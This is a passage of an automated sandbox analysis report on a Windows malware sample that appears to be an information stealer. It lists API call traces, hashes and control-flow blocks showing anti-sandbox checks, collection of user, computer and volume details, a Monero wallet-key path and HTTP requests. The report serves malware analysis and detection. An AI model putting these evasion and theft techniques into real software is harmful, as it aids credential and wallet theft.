                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                      • String ID: "$"$($------$------$------$H
                      • API String ID: 460715078-3550990314
                      • Opcode ID: d154d938e119b39d2800797960ae6fc1c2e8f82ed8e262f6281bd9644472c3cc
                      • Instruction ID: e356788a342f2a02b2b39553800bcb82e6da6e0433d1307a7266470fe4d75db2
                      • Opcode Fuzzy Hash: d154d938e119b39d2800797960ae6fc1c2e8f82ed8e262f6281bd9644472c3cc
                      • Instruction Fuzzy Hash: 74121171910158AADB15EB90DDA2FEEB338BF24301F90419AB50673191EF706F49CF66
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001C11B7), ref: 001D7880
                      • RtlAllocateHeap.NTDLL(00000000), ref: 001D7887
                      • GetUserNameA.ADVAPI32(00000104,00000104), ref: 001D789F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateNameProcessUser
                      • String ID:
                      • API String ID: 1296208442-0
                      • Opcode ID: ff2e85a06ae1d3bd0daeb20d90245a02f0216168d37cb2a64563e19a94419507
                      • Instruction ID: 68b5c14631a8a3b8f0d653a7b51b2a28cde63d99b743189dad970cc9c3fbd47f
                      • Opcode Fuzzy Hash: ff2e85a06ae1d3bd0daeb20d90245a02f0216168d37cb2a64563e19a94419507
                      • Instruction Fuzzy Hash: AFF04FB2944208ABC714DF98DD49BAEBBB8EB05711F10426AFA05A3780C77455048BA1
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitInfoProcessSystem
                      • String ID:
                      • API String ID: 752954902-0
                      • Opcode ID: 102c24742ab15010738fcf705b4a701a8f0b3f33881cf78cf4e1ac17c9e0955c
                      • Instruction ID: a074f297f9e17dbef0ae503ffbcba7568757581574ad3fa8a2b461c5ddf6f264
                      • Opcode Fuzzy Hash: 102c24742ab15010738fcf705b4a701a8f0b3f33881cf78cf4e1ac17c9e0955c
                      • Instruction Fuzzy Hash: DAD05E7490030CDBCB00DFE0D949AEDBB78FB08311F000568DD0573340EB309491CAAA

                      Control-flow Graph

                      (rendered graph not reproduced; it spans blocks 1d9c10-1da709 and consists of the LoadLibraryA and repeated GetProcAddress calls listed under APIs below; block edges and Executed / Not Executed colouring omitted)
                      APIs
                      • GetProcAddress.KERNEL32(74DD0000,00E25990), ref: 001D9C2D
                      • GetProcAddress.KERNEL32(74DD0000,00E25690), ref: 001D9C45
                      • GetProcAddress.KERNEL32(74DD0000,00E39568), ref: 001D9C5E
                      • GetProcAddress.KERNEL32(74DD0000,00E39598), ref: 001D9C76
                      • GetProcAddress.KERNEL32(74DD0000,00E39628), ref: 001D9C8E
                      • GetProcAddress.KERNEL32(74DD0000,00E395E0), ref: 001D9CA7
                      • GetProcAddress.KERNEL32(74DD0000,00E2BB88), ref: 001D9CBF
                      • GetProcAddress.KERNEL32(74DD0000,00E3D480), ref: 001D9CD7
                      • GetProcAddress.KERNEL32(74DD0000,00E3D570), ref: 001D9CF0
                      • GetProcAddress.KERNEL32(74DD0000,00E3D4F8), ref: 001D9D08
                      • GetProcAddress.KERNEL32(74DD0000,00E3D420), ref: 001D9D20
                      • GetProcAddress.KERNEL32(74DD0000,00E259B0), ref: 001D9D39
                      • GetProcAddress.KERNEL32(74DD0000,00E256D0), ref: 001D9D51
                      • GetProcAddress.KERNEL32(74DD0000,00E25610), ref: 001D9D69
                      • GetProcAddress.KERNEL32(74DD0000,00E257D0), ref: 001D9D82
                      • GetProcAddress.KERNEL32(74DD0000,00E3D4B0), ref: 001D9D9A
                      • GetProcAddress.KERNEL32(74DD0000,00E3D468), ref: 001D9DB2
                      • GetProcAddress.KERNEL32(74DD0000,00E2B958), ref: 001D9DCB
                      • GetProcAddress.KERNEL32(74DD0000,00E25630), ref: 001D9DE3
                      • GetProcAddress.KERNEL32(74DD0000,00E3D540), ref: 001D9DFB
                      • GetProcAddress.KERNEL32(74DD0000,00E3D450), ref: 001D9E14
                      • GetProcAddress.KERNEL32(74DD0000,00E3D510), ref: 001D9E2C
                      • GetProcAddress.KERNEL32(74DD0000,00E3D3D8), ref: 001D9E44
                      • GetProcAddress.KERNEL32(74DD0000,00E25830), ref: 001D9E5D
                      • GetProcAddress.KERNEL32(74DD0000,00E3D498), ref: 001D9E75
                      • GetProcAddress.KERNEL32(74DD0000,00E3D4C8), ref: 001D9E8D
                      • GetProcAddress.KERNEL32(74DD0000,00E3D4E0), ref: 001D9EA6
                      • GetProcAddress.KERNEL32(74DD0000,00E3D528), ref: 001D9EBE
                      • GetProcAddress.KERNEL32(74DD0000,00E3D558), ref: 001D9ED6
                      • GetProcAddress.KERNEL32(74DD0000,00E3D588), ref: 001D9EEF
                      • GetProcAddress.KERNEL32(74DD0000,00E3D3F0), ref: 001D9F07
                      • GetProcAddress.KERNEL32(74DD0000,00E3D408), ref: 001D9F1F
                      • GetProcAddress.KERNEL32(74DD0000,00E3D438), ref: 001D9F38
                      • GetProcAddress.KERNEL32(74DD0000,00E3A7C0), ref: 001D9F50
                      • GetProcAddress.KERNEL32(74DD0000,00E3CFA0), ref: 001D9F68
                      • GetProcAddress.KERNEL32(74DD0000,00E3D018), ref: 001D9F81
                      • GetProcAddress.KERNEL32(74DD0000,00E25650), ref: 001D9F99
                      • GetProcAddress.KERNEL32(74DD0000,00E3D060), ref: 001D9FB1
                      • GetProcAddress.KERNEL32(74DD0000,00E252B0), ref: 001D9FCA
                      • GetProcAddress.KERNEL32(74DD0000,00E3CE50), ref: 001D9FE2
                      • GetProcAddress.KERNEL32(74DD0000,00E3CF58), ref: 001D9FFA
                      • GetProcAddress.KERNEL32(74DD0000,00E25530), ref: 001DA013
                      • GetProcAddress.KERNEL32(74DD0000,00E25290), ref: 001DA02B
                      • LoadLibraryA.KERNEL32(00E3CE80,?,001D5CA3,001E0AEB,?,?,?,?,?,?,?,?,?,?,001E0AEA,001E0AE3), ref: 001DA03D
                      • LoadLibraryA.KERNEL32(00E3CF88,?,001D5CA3,001E0AEB,?,?,?,?,?,?,?,?,?,?,001E0AEA,001E0AE3), ref: 001DA04E
                      • LoadLibraryA.KERNEL32(00E3CFE8,?,001D5CA3,001E0AEB,?,?,?,?,?,?,?,?,?,?,001E0AEA,001E0AE3), ref: 001DA060
                      • LoadLibraryA.KERNEL32(00E3CE98,?,001D5CA3,001E0AEB,?,?,?,?,?,?,?,?,?,?,001E0AEA,001E0AE3), ref: 001DA072
                      • LoadLibraryA.KERNEL32(00E3D078,?,001D5CA3,001E0AEB,?,?,?,?,?,?,?,?,?,?,001E0AEA,001E0AE3), ref: 001DA083
                      • LoadLibraryA.KERNEL32(00E3CFD0,?,001D5CA3,001E0AEB,?,?,?,?,?,?,?,?,?,?,001E0AEA,001E0AE3), ref: 001DA095
                      • LoadLibraryA.KERNEL32(00E3D090,?,001D5CA3,001E0AEB,?,?,?,?,?,?,?,?,?,?,001E0AEA,001E0AE3), ref: 001DA0A7
                      • LoadLibraryA.KERNEL32(00E3CFB8,?,001D5CA3,001E0AEB,?,?,?,?,?,?,?,?,?,?,001E0AEA,001E0AE3), ref: 001DA0B8
                      • GetProcAddress.KERNEL32(75290000,00E25410), ref: 001DA0DA
                      • GetProcAddress.KERNEL32(75290000,00E3CEB0), ref: 001DA0F2
                      • GetProcAddress.KERNEL32(75290000,00E38F80), ref: 001DA10A
                      • GetProcAddress.KERNEL32(75290000,00E3CF70), ref: 001DA123
                      • GetProcAddress.KERNEL32(75290000,00E252D0), ref: 001DA13B
                      • GetProcAddress.KERNEL32(6FD40000,00E2BC28), ref: 001DA160
                      • GetProcAddress.KERNEL32(6FD40000,00E25450), ref: 001DA179
                      • GetProcAddress.KERNEL32(6FD40000,00E2BA20), ref: 001DA191
                      • GetProcAddress.KERNEL32(6FD40000,00E3CE20), ref: 001DA1A9
                      • GetProcAddress.KERNEL32(6FD40000,00E3D0A8), ref: 001DA1C2
                      • GetProcAddress.KERNEL32(6FD40000,00E25230), ref: 001DA1DA
                      • GetProcAddress.KERNEL32(6FD40000,00E25330), ref: 001DA1F2
                      • GetProcAddress.KERNEL32(6FD40000,00E3D030), ref: 001DA20B
                      • GetProcAddress.KERNEL32(752C0000,00E253D0), ref: 001DA22C
                      • GetProcAddress.KERNEL32(752C0000,00E25490), ref: 001DA244
                      • GetProcAddress.KERNEL32(752C0000,00E3D000), ref: 001DA25D
                      • GetProcAddress.KERNEL32(752C0000,00E3CDD8), ref: 001DA275
                      • GetProcAddress.KERNEL32(752C0000,00E25270), ref: 001DA28D
                      • GetProcAddress.KERNEL32(74EC0000,00E2B908), ref: 001DA2B3
                      • GetProcAddress.KERNEL32(74EC0000,00E2B868), ref: 001DA2CB
                      • GetProcAddress.KERNEL32(74EC0000,00E3CE38), ref: 001DA2E3
                      • GetProcAddress.KERNEL32(74EC0000,00E25350), ref: 001DA2FC
                      • GetProcAddress.KERNEL32(74EC0000,00E252F0), ref: 001DA314
                      • GetProcAddress.KERNEL32(74EC0000,00E2BC00), ref: 001DA32C
                      • GetProcAddress.KERNEL32(75BD0000,00E3D0C0), ref: 001DA352
                      • GetProcAddress.KERNEL32(75BD0000,00E254B0), ref: 001DA36A
                      • GetProcAddress.KERNEL32(75BD0000,00E38EF0), ref: 001DA382
                      • GetProcAddress.KERNEL32(75BD0000,00E3D048), ref: 001DA39B
                      • GetProcAddress.KERNEL32(75BD0000,00E3CDF0), ref: 001DA3B3
                      • GetProcAddress.KERNEL32(75BD0000,00E253F0), ref: 001DA3CB
                      • GetProcAddress.KERNEL32(75BD0000,00E254D0), ref: 001DA3E4
                      • GetProcAddress.KERNEL32(75BD0000,00E3CE08), ref: 001DA3FC
                      • GetProcAddress.KERNEL32(75BD0000,00E3CE68), ref: 001DA414
                      • GetProcAddress.KERNEL32(75A70000,00E25370), ref: 001DA436
                      • GetProcAddress.KERNEL32(75A70000,00E3CEC8), ref: 001DA44E
                      • GetProcAddress.KERNEL32(75A70000,00E3CEE0), ref: 001DA466
                      • GetProcAddress.KERNEL32(75A70000,00E3CEF8), ref: 001DA47F
                      • GetProcAddress.KERNEL32(75A70000,00E3CF10), ref: 001DA497
                      • GetProcAddress.KERNEL32(75450000,00E25310), ref: 001DA4B8
                      • GetProcAddress.KERNEL32(75450000,00E25390), ref: 001DA4D1
                      • GetProcAddress.KERNEL32(75DA0000,00E25430), ref: 001DA4F2
                      • GetProcAddress.KERNEL32(75DA0000,00E3CF28), ref: 001DA50A
                      • GetProcAddress.KERNEL32(6F070000,00E253B0), ref: 001DA530
                      • GetProcAddress.KERNEL32(6F070000,00E255F0), ref: 001DA548
                      • GetProcAddress.KERNEL32(6F070000,00E25470), ref: 001DA560
                      • GetProcAddress.KERNEL32(6F070000,00E3CF40), ref: 001DA579
                      • GetProcAddress.KERNEL32(6F070000,00E25550), ref: 001DA591
                      • GetProcAddress.KERNEL32(6F070000,00E254F0), ref: 001DA5A9
                      • GetProcAddress.KERNEL32(6F070000,00E25510), ref: 001DA5C2
                      • GetProcAddress.KERNEL32(6F070000,00E25570), ref: 001DA5DA
                      • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 001DA5F1
                      • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 001DA607
                      • GetProcAddress.KERNEL32(75AF0000,00E3D300), ref: 001DA629
                      • GetProcAddress.KERNEL32(75AF0000,00E38FF0), ref: 001DA641
                      • GetProcAddress.KERNEL32(75AF0000,00E3D330), ref: 001DA659
                      • GetProcAddress.KERNEL32(75AF0000,00E3D168), ref: 001DA672
                      • GetProcAddress.KERNEL32(75D90000,00E255B0), ref: 001DA693
                      • GetProcAddress.KERNEL32(6E330000,00E3D240), ref: 001DA6B4
                      • GetProcAddress.KERNEL32(6E330000,00E25590), ref: 001DA6CD
                      • GetProcAddress.KERNEL32(6E330000,00E3D1C8), ref: 001DA6E5
                      • GetProcAddress.KERNEL32(6E330000,00E3D2E8), ref: 001DA6FD
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Similarity
                      • API ID: AddressProc$LibraryLoad
                      • String ID: 0R$0S$0T$0U$0V$0X$HttpQueryInfoA$InternetSetOptionA$PS$PT$PU$PV$pR$pS$pT$pU
                      • API String ID: 2238633743-1605884471
                      • Opcode ID: af9197872abccc924e69e03b4f269d4d4cdc9b4e54c9a26aa0e992b9e4e474ab
                      • Instruction ID: 4d0d9ae3543f3bea1dbf420a71b3a124d013330d9a8c6628a002ba910e9c9e60
                      • Opcode Fuzzy Hash: af9197872abccc924e69e03b4f269d4d4cdc9b4e54c9a26aa0e992b9e4e474ab
                      • Instruction Fuzzy Hash: 99621CB6510300AFC344EFA8EF8895677F9F78C301714C53AA609E3264D739A865DF6A

                      Control-flow Graph
                      APIs
                        • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                        • Part of subcall function 001C47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 001C4839
                        • Part of subcall function 001C47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 001C4849
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                      • InternetOpenA.WININET(001E0DFE,00000001,00000000,00000000,00000000), ref: 001C62E1
                      • StrCmpCA.SHLWAPI(?,00E3EA28), ref: 001C6303
                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 001C6335
                      • HttpOpenRequestA.WININET(00000000,GET,?,00E3E3A0,00000000,00000000,00400100,00000000), ref: 001C6385
                      • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001C63BF
                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001C63D1
                      • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 001C63FD
                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 001C646D
                      • InternetCloseHandle.WININET(00000000), ref: 001C64EF
                      • InternetCloseHandle.WININET(00000000), ref: 001C64F9
                      • InternetCloseHandle.WININET(00000000), ref: 001C6503
                      Similarity
                      • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                      • String ID: ($ERROR$ERROR$GET
                      • API String ID: 3749127164-2906118479
                      • Opcode ID: d38943fd44b17974666f1171b838aa44bf8ac7edb62a6589565f38f2c08e8833
                      • Instruction ID: 63c63a5e952511414adeff31252e7845634c8e2e5646df24ce3a53c64f0e5449
                      • Opcode Fuzzy Hash: d38943fd44b17974666f1171b838aa44bf8ac7edb62a6589565f38f2c08e8833
                      • Instruction Fuzzy Hash: 1A716D71A00358ABDB14DBA0CC49FEE7778BF54700F5081A9F50A6B290DBB4AA85CF56

                      Control-flow Graph
                      APIs
                        • Part of subcall function 001DA820: lstrlen.KERNEL32(001C4F05,?,?,001C4F05,001E0DDE), ref: 001DA82B
                        • Part of subcall function 001DA820: lstrcpy.KERNEL32(001E0DDE,00000000), ref: 001DA885
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 001D5644
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001D56A1
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001D5857
                        • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                        • Part of subcall function 001D51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001D5228
                        • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                        • Part of subcall function 001D52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 001D5318
                        • Part of subcall function 001D52C0: lstrlen.KERNEL32(00000000), ref: 001D532F
                        • Part of subcall function 001D52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 001D5364
                        • Part of subcall function 001D52C0: lstrlen.KERNEL32(00000000), ref: 001D5383
                        • Part of subcall function 001D52C0: lstrlen.KERNEL32(00000000), ref: 001D53AE
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 001D578B
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 001D5940
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001D5A0C
                      • Sleep.KERNEL32(0000EA60), ref: 001D5A1B
                      Similarity
                      • API ID: lstrcpylstrlen$Sleep
                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$pW
                      • API String ID: 507064821-2622519717
                      • Opcode ID: 948b29ce05f72a2bb61a3a39cb1ae68c0527fa5fac63e0e87d4fcf5d74970f96
                      • Instruction ID: 8d15e22a190222905b3b0bd1e0a468d077639097251ff822dfa396082b00f2a4
                      • Opcode Fuzzy Hash: 948b29ce05f72a2bb61a3a39cb1ae68c0527fa5fac63e0e87d4fcf5d74970f96
                      • Instruction Fuzzy Hash: 8CE14772910144AACB14FBA0DD92EED7339AF74301F90812AF40667291EF35AF19DB96

                      Control-flow Graph
                      APIs
                      • StrCmpCA.SHLWAPI(00000000,block), ref: 001D17C5
                      • ExitProcess.KERNEL32 ref: 001D17D1
                      Similarity
                      • API ID: ExitProcess
                      • String ID: block
                      • API String ID: 621844428-2199623458
                      • Opcode ID: 75085fe1ac08a5c4673048ed3e2da7c03d9f7657c5e719c0686aba111267aa3b
                      • Instruction ID: 3b5545bfde25496e994b35395ece2a6ae118fc99518c2b14f2548c027678cf54
                      • Opcode Fuzzy Hash: 75085fe1ac08a5c4673048ed3e2da7c03d9f7657c5e719c0686aba111267aa3b
                      • Instruction Fuzzy Hash: 9C514DB5A0420AFFCB08DFE1D9A4ABE77B5BF44708F10905AE406A7350D770EA51DB62

                      Control-flow Graph
                      APIs
                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 001D7542
                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001D757F
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001D7603
                      • RtlAllocateHeap.NTDLL(00000000), ref: 001D760A
                      • wsprintfA.USER32 ref: 001D7640
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                      Similarity
                      • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                      • String ID: :$C$\
                      • API String ID: 1544550907-3809124531
                      • Opcode ID: 1c229ff4ad43a190641dbdd6504134e5174b0b4f925bb6b45d2333002f14749b
                      • Instruction ID: ac925e86425f109bf996a0a4a0a7a367a429866c99c26f13d6bbf8797ee8b4dd
                      • Opcode Fuzzy Hash: 1c229ff4ad43a190641dbdd6504134e5174b0b4f925bb6b45d2333002f14749b
                      • Instruction Fuzzy Hash: 024181B1D04358ABDB10DF94DC45BEEBBB8AF18704F10419AF509772C0E775AA44CBA5

                      Control-flow Graph

                      APIs
                        • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,00E32320), ref: 001D98A1
                        • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,00E32368), ref: 001D98BA
                        • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,00E32170), ref: 001D98D2
                        • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,00E322A8), ref: 001D98EA
                        • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,00E32440), ref: 001D9903
                        • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,00E38FA0), ref: 001D991B
                        • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,00E258F0), ref: 001D9933
                        • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,00E25870), ref: 001D994C
                        • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,00E32338), ref: 001D9964
                        • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,00E32398), ref: 001D997C
                        • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,00E32380), ref: 001D9995
                        • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,00E323E0), ref: 001D99AD
                        • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,00E25910), ref: 001D99C5
                        • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,00E323F8), ref: 001D99DE
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                        • Part of subcall function 001C11D0: ExitProcess.KERNEL32 ref: 001C1211
                        • Part of subcall function 001C1160: GetSystemInfo.KERNEL32(?), ref: 001C116A
                        • Part of subcall function 001C1160: ExitProcess.KERNEL32 ref: 001C117E
                        • Part of subcall function 001C1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 001C112B
                        • Part of subcall function 001C1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 001C1132
                        • Part of subcall function 001C1110: ExitProcess.KERNEL32 ref: 001C1143
                        • Part of subcall function 001C1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 001C123E
                        • Part of subcall function 001C1220: ExitProcess.KERNEL32 ref: 001C1294
                        • Part of subcall function 001D6770: GetUserDefaultLangID.KERNEL32 ref: 001D6774
                        • Part of subcall function 001C1190: ExitProcess.KERNEL32 ref: 001C11C6
                        • Part of subcall function 001D7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001C11B7), ref: 001D7880
                        • Part of subcall function 001D7850: RtlAllocateHeap.NTDLL(00000000), ref: 001D7887
                        • Part of subcall function 001D7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 001D789F
                        • Part of subcall function 001D78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001D7910
                        • Part of subcall function 001D78E0: RtlAllocateHeap.NTDLL(00000000), ref: 001D7917
                        • Part of subcall function 001D78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 001D792F
                        • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                        • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                        • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                        • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00E38F10,?,001E110C,?,00000000,?,001E1110,?,00000000,001E0AEF), ref: 001D6ACA
                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001D6AE8
                      • CloseHandle.KERNEL32(00000000), ref: 001D6AF9
                      • Sleep.KERNEL32(00001770), ref: 001D6B04
                      • CloseHandle.KERNEL32(?,00000000,?,00E38F10,?,001E110C,?,00000000,?,001E1110,?,00000000,001E0AEF), ref: 001D6B1A
                      • ExitProcess.KERNEL32 ref: 001D6B22
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                      • String ID:
                      • API String ID: 2931873225-0
                      • Opcode ID: c6c3266ee73cfdad01cdd7be8abaf69fed322282218919e951389580eda7c53c
                      • Instruction ID: 56848e4a0d9a8341872a63fbb8e8a46d62d9e76056a42421ad43ddb698981f75
                      • Opcode Fuzzy Hash: c6c3266ee73cfdad01cdd7be8abaf69fed322282218919e951389580eda7c53c
                      • Instruction Fuzzy Hash: C6312371940218ABDB04F7F0DC56FEE7778AF24301F90452AF502A22D2DF749905D7A6

                       Control-flow Graph
                       (rendered graph not preserved; legend: Executed / Not Executed. Basic blocks and edges recovered from the graph data:)
                       • 1d6aba-1d6ad7: call 1daad0, OpenEventA; branches to 1d6ad9 or to 1d6af5
                       • 1d6ad9-1d6af1: call 1daad0, CreateEventA; continues to 1d6b0c
                       • 1d6af3: continues to 1d6b0a
                       • 1d6af5-1d6b04: CloseHandle, Sleep; continues to 1d6b0a
                       • 1d6b0a: branches back to 1d6aba or to 1d6b0c
                       • 1d6b0c-1d6b22: call 1d6920, call 1d5b10, CloseHandle, ExitProcess
                      APIs
                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00E38F10,?,001E110C,?,00000000,?,001E1110,?,00000000,001E0AEF), ref: 001D6ACA
                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001D6AE8
                      • CloseHandle.KERNEL32(00000000), ref: 001D6AF9
                      • Sleep.KERNEL32(00001770), ref: 001D6B04
                      • CloseHandle.KERNEL32(?,00000000,?,00E38F10,?,001E110C,?,00000000,?,001E1110,?,00000000,001E0AEF), ref: 001D6B1A
                      • ExitProcess.KERNEL32 ref: 001D6B22
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                      • String ID:
                      • API String ID: 941982115-0
                      • Opcode ID: 5e7c4082baa9063e73f45a5f2453f5ae50197617195a035fe675c7e6c4c7a726
                      • Instruction ID: 7fb685d9ee84127ecffa19bf0666dec68f0f017d93d8810926bdf130a1a6a69e
                      • Opcode Fuzzy Hash: 5e7c4082baa9063e73f45a5f2453f5ae50197617195a035fe675c7e6c4c7a726
                      • Instruction Fuzzy Hash: D6F05E30A40329AFEB00EBA0DD06BBD7B34EF14701F108927F502B22C1DBB05540D69A

                      Control-flow Graph

                      APIs
                      • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 001C4839
